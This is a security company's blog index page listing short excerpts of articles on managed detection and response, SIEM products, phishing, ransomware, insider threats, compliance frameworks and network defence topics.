Organizations of all sizes rely on managed security service providers (MSSPs) to deliver managed detection and response (MDR) and additional cybersecurity services at scale. Understanding the various service options can save your organization money and resources. The difference in technology and its usage is the primary differentiating factor between MDR providers. While some rely on […]

FireEye Breach - Our Observations

Cybersecurity firm FireEye experienced a major breach in December of 2020. Castra actively investigated for deeper, specific information from our sources about how FireEye detected such a sophisticated, persistent, nation-state backed novel attack on their network and systems. This was likely the most frightening and impactful breach that we have seen happen all year.

What is Microsoft Defender for Endpoint and How Does it Work?

Microsoft Defender for Endpoint, formerly known as Microsoft Defender Advanced Threat Protection, provides enterprise-level protection to endpoints to prevent, detect, investigate, and respond to advanced threats. The platform provides preventative protection, post-breach detection, automated investigation, and response to possible threats or breaches in security. Whether your company is considering implementing Microsoft Defender for Endpoint or […]

Behavioral Indicators of Insider Threat Activity

Contrary to popular belief, an insider threat is not always a security risk within an organization's immediate perimeter. Current employees and managers aside, an insider threat could be a former employee who had access to specific information, a third-party consultant, or a business partner. In any case, malicious insiders account for about 38 percent of […]

Why User Education is #1 in Cyber Resilience

Statistical data shows that over one-third, or 36 percent, of ransomware infections happen due to a lack of cybersecurity training in organizations across all industry verticals. Another 30 percent of the ransomware infections worldwide materialize because of weak user passwords, while 25 percent are due to poor user practices, according to managed service providers (MSPs) […]

Best Practices for Vulnerability Management

One can broadly define vulnerability management as a set of processes and procedures to identify, analyze, and manage vulnerabilities across a critical service's operating environment. This broad definition extends to IT systems and infrastructure, which are now as critical as power generation facilities and resource gathering operations. Keeping in mind the growing number and sophistication of […]

Top 5 Takeaways for NIST 800-53 Rev 5

Recapping a highlight from Cybersecurity Awareness Month, the National Institute of Standards and Technology (NIST) has released an update to its master IT security guidance document, Special Publication 800-53. This update, "Rev 5," is the first major change to SP 800-53 in seven years, and a lot has changed in cybersecurity since 2013. The new […]

What is Microsoft Azure Traffic Manager?

bal regions and secure an optimal level of availability and responsiveness for your services. How Azure Traffic Manager Works Azure Traffic Manager directs client requests to the most suitable service endpoint by using DNS (Domain Name Server). The load balancer examines the health of the endpoints and then applies a traffic-routing method to distribute the traffic. […]

What is Microsoft Azure Security Center?

Azure Security Center by Microsoft is a solution that provides unified security management across hybrid cloud workloads. It offers threat protection for data centers within both cloud workloads and on-premises. The platform also works with hybrid clouds that are not part of the Azure ecosystem. The Azure Security Center is designed to resolve a pressing problem when […]

RSA Cloud Security Solutions

RSA Security LLC is one of the leading providers of network security services focusing on encryption and data security. Launching their services back in 1984, they are a global security company gradually transforming their business to protect organizations in the cloud. Cloud security is not just a growing business but also an irreversible trend in […]

Google Chronicle vs Splunk

Alphabet’s announcement concerning the inclusion of big-data security into Chronicle led to a 5% drop in the value of Splunk’s shares and sparked a debate on which security information and event management (SIEM) tool supplies better options. As with many comparisons, a definite answer on which SIEM tool is best is one that comes with […]

Mimecast: Outlook Plugin

Mimecast is a security company that offers solutions for corporate users to secure their email communications along with threat detection technologies. Mimecast Outlook Plugin is a tool that works on Microsoft Exchange servers to protect your email platform within the widely used Outlook platform, covering a variety of threats. How the Mimecast Outlook Plugin Works […]

Google VirusTotal Overview

Lumifi has been working with leaders in malware detection and threat intelligence for years. As we launch our cloud-native Managed Detection and Response offering with Google Chronicle, we are also integrating with VirusTotal. Read our comprehensive guide to VirusTotal and its free and enterprise features. What is VirusTotal? Google’s VirusTotal is a web-based scanner that utilizes over 70 […]

SentinelOne: Security Integrations

SentinelOne is known for its AI-driven endpoint security protection platform (EPP). The lightweight agent integrates with leading security tools and platforms. Their team regularly announces partnerships and development with best-in-breed tools. API-First Approach SentinelOne was created with an API-first approach, made to interface seamlessly with leading security tools. Their current automation integrations include SonicWall, Fortinet, […]

Popular MFA Solutions

Multi-factor authentication (MFA) is a method and technology to verify a user’s identity by requiring two or more credential category types before the user is able to log into a system or make a transaction. The MFA method requires a successful combination of at least two independent credentials, which are generally drawn from the following three credential categories: Note: Multi-factor authentication is not limited […]

What are Managed Security Services?

The use of managed services is growing as organizations struggle to supervise multiple sophisticated software systems and advanced corporate networks. One specific area of company outsourcing is the implementation and management of cyber defenses to protect digital assets against ever-evolving security threats. Managed Security Service Providers (MSSPs) address several business-critical issues organizations face when it comes to cybersecurity. A managed security service provider can assist in creating and deploying complex security infrastructure, managing platforms and tools, performing incident response, and providing continuous 24/7/365 monitoring. […]

Yet Another Ransomware That Can be Immediately Detected with Process Tracking on Workstations

As I write this, yet another ransomware attack is underway. This time it’s called Petya, and it again uses SMB to spread. But here’s the thing — it uses an EXE to get its work done.

VIDEO: Remote Workforce Roundtable Interview with Greg Foss

The full interview with Greg Foss, Senior Threat Researcher at VMware Carbon Black, an endpoint protection-focused cybersecurity solutions provider. The interview is about the recent shift to a remote workforce due to the COVID-19 pandemic. Topics of the interview include the marketing hype, addressing a remote workforce, and moving forward with the Coronavirus implications. Questions include: As […]

What is a VPN?

A virtual private network (VPN) enables two or more devices to send and receive data using a secure private connection over a public network such as the Internet. VPNs use a technology called "tunneling" to establish a secure connection between an organization's network and an outside network through the insecure environment of a public network […]

Phishing on the Rise During the Pandemic – Here's How to Fight It

Cybersecurity threats based on major disasters or world events are nothing new. During the coronavirus pandemic, one threat in particular has increased much more quickly than others: phishing for sensitive information in disguised emails. During March 2020 alone, phishing attacks were up 667 percent! Protecting your system from the malicious intrusion of phishing emails is […]

Leveraging the Power of Exabeam

Organizations of all sizes are dealing with more data than ever before, and as Lumifi learns about increasingly complex attack vectors, it is worth noting that traditional SIEM may no longer fit the purpose of the modern security program. Traditional SIEMs are based on correlation rules, with no machine learning and no behavioral monitoring. Security teams, […]

Leveraging the Power of Exabeam

Organizations of all sizes are dealing with more data than ever before, and as Castra learns about increasingly complex attack vectors, it is worth noting that traditional SIEM may no longer fit the purpose of the modern security program.

What is Email Encryption?

Encryption is a method to encipher data that a user sends and receives, as well as data that resides on endpoints and servers. Any organization must handle Data at Rest and Data in Transit, the former being the data stored on corporate endpoints and servers, while Data in Transit represents any message or document employees […]

How a SOC Handles Credential Harvesting

Dealing with credential harvesters has its perks. Day in and day out I get to personally observe how sophisticated a phishing website can be. Some websites are so elaborate that only a trained analyst can identify them, while others are so obvious no one in their right mind would fall for it. Either way, if […]

What is SCADA and IoT?

Learn about the difference between SCADA and IoT systems and how they work and compare to one another. What are SCADA systems? Supervisory control and data acquisition (SCADA) systems have been used for decades to monitor and control production facilities or equipment across industries such as oil and gas refining, energy distribution, water management, waste […]

Sarbanes-Oxley Act Overview

The Sarbanes-Oxley Act (SOX) was enacted in 2002 following a series of corporate scandals involving large public companies in the United States. The main goal of the legislation was to restore the trust in the U.S. financial markets and prevent public companies from defrauding their investors. The law, also known as the “Public Company Accounting […]

Ensuring the Cybersecurity of a Remote Workforce

As the COVID-19 pandemic continues to grip the globe, many companies are finding it necessary to transition from on-site to remote work – and experts warn this could be the new normal for the foreseeable future. Is your company ready to make the switch securely? Lumifi has some tips on making the transition with cybersecurity […]

FBI Warns ICS Cybersecurity Under Attack by Kwampirs

The ICS sector is under attack. According to the Federal Bureau of Investigation (FBI), a new security threat is on the horizon for those in the Industrial Control System (ICS) sector. While the Kwampirs remote access Trojan (or RAT) is not new, it is now targeting ICS companies and especially the energy sector. The FBI […]

How to Deploy: Carbon Black (CB) Defense Sensor

Carbon Black (CB) Defense is a distributed process monitoring tool for threat detection across enterprise networks. The Carbon Black sensor executes data capturing activities to discover suspicious activities that occur within a network. Once deployed, the CB Defense sensor stays on and always collects data that can be categorized and analyzed for suspicious activities. To […]

5 Ways to Protect Your Business' Data During Tax Season

If you're an accountant or tax professional, you know that tax season is also scam season and that you're a prime target. Cybercriminals are using new, sophisticated scams that can compromise your website or infiltrate your systems with remote desktop software. These join the more traditional email-based attacks that trick you into installing malware that […]

Why Phishing is Still a Problem

Is Phishing Still a Problem? The short answer is yes. The long answer is that it is a growing problem for businesses each day, one that requires greater defense. Phishing is the most popular attack vector for criminals and has grown 65% in the last year, according to Retruster. Lumifi is here to explain phishing, how attacks […]

Successful Password Policies for Organizations

Learn some of the basic considerations when establishing a strong password policy for your organization. Find out some of the best practices and industry standards when it comes to user access and a password policy framework. Most places of business require that their employees access their facilities by using a key or key card. In […]

Improving Visibility and Preventing a Miss - Part 1: Mandatory PowerShell Logging

One of the greatest risks for a SIEM or SOAR platform is missing that one event that helps with accurate detection. In general, misses can occur for several reasons, although in our experience, misses mostly stem from incorrect/empty PowerShell logs or merely a lack of logging required for advanced detection.

Microsoft Releases Notice of More RDP Vulnerabilities

Two more security issues have been announced surrounding Remote Code Execution against Remote Desktop Services (RDP). Microsoft released a notice today concerning two vulnerabilities, each of which would result in a Remote Code Execution vulnerability against RDP. These are being tracked under CVE-2019-1181 and CVE-2019-1182. This is akin to the previous vulnerability that we notified you of, CVE-2019-0708, aka […]

Everyone Wants to Be a Penetration Tester

There is a lot more to cyber security than just hacking... So… Everyone wants to be a penetration tester! Lately I’ve been speaking at events, conducting interviews, mentoring new security professionals and students and every single person when asked how they want their career to progress or what they are interested in doing, like clockwork […]

The Four Pillars of Network Security

Every organization works hard to attain a healthy security posture. But what does that mean? It involves a properly resourced team of network security experts working to leverage the latest information security tools. The job of the security team is to prevent attacks before they happen, protect the organization in the case of an attack, […]

The True Cost of Information Security

In-House vs. Outsourced SIEM Management: Discover the True Cost of IT Security (Updated November 2022) Your SIEM management needs will grow over time. Can your information security team follow suit? Security information event management is one of the pillars of effective information security. Capturing and investigating event logs lets security operators detect and respond to […]

Block Threats with Lumifi & Netshield

Lumifi can now combine the power of Netshield's active blocking with AlienVault's USM and immediately block rogue devices AND monitor egress network traffic to effectively block malicious behaviors like malware and phishing. Through the power of Netshield's Network Access Control (NAC), Lumifi can offer unrivaled protection for the inside of your network. Firewalls are a […]

Top 5 Cybersecurity Steps to Take in 2019

Cross-posted from Net Friends. Author(s): Net Friends

Beginners Guide to IDS, IPS & UTM

There is often a lingering and general confusion over the acronyms IDS and IPS, and how they are like or unlike UTM software modules. Everyone likes primers and simple descriptive definitions; so let's take a look at IDS, IPS, and UTM through that lens. IDS An Intrusion Detection Sensor (IDS) is a tool that most […]

Why Set-and-Forget SIEM Deployments Often Fail

(Updated April 2022) There are many ways to optimize and automate your SIEM workflow, but you can't replace the human element. 

Shadyware ... Malware or Legit Software

What's the difference between malware and legitimate software? Just as malware is often purported to be legitimate software, legitimate software sometimes uses unethical marketing and operating practices. Some folks term this "Shadyware." It is marketed as useful software, which it may be in part, but it also contains annoying or harmful functionality that negatively impacts […]

Adblocking

Adblocking is becoming a more and more contentious topic in recent days. Publications, understandably, do not want people to block ads - they derive much of their revenue from them. Users find them to be intrusive and often feel that they impede their usage of a site; and, given the recent meteoric rise of malvertising, […]

Egress Filtering: A Valuable Part of Your Multi-layered Security Posture

The concept has become increasingly important as cloud infrastructure expands throughout the enterprise IT network. (Updated May 2022)

Network segmentation

Network segmentation is the practice of dividing a formerly 'flat' network [where every device can contact every other device] into a series of segments that have restricted communication between them. What's this mean in real terms, though? And why would you want it - and is it useful outside of making PCI compliance easier? In […]

Four Pillars of Information Security

Every organization is working hard to possess a "strong security posture." But what does that mean? A strong security posture means you possess a healthy quantity and quality of Information Security Experts (Human Beings) and Information Security Tools (Technology/Products). Information Security Experts are leveraging Information Security Tools to prevent attacks before they happen, protect the […]
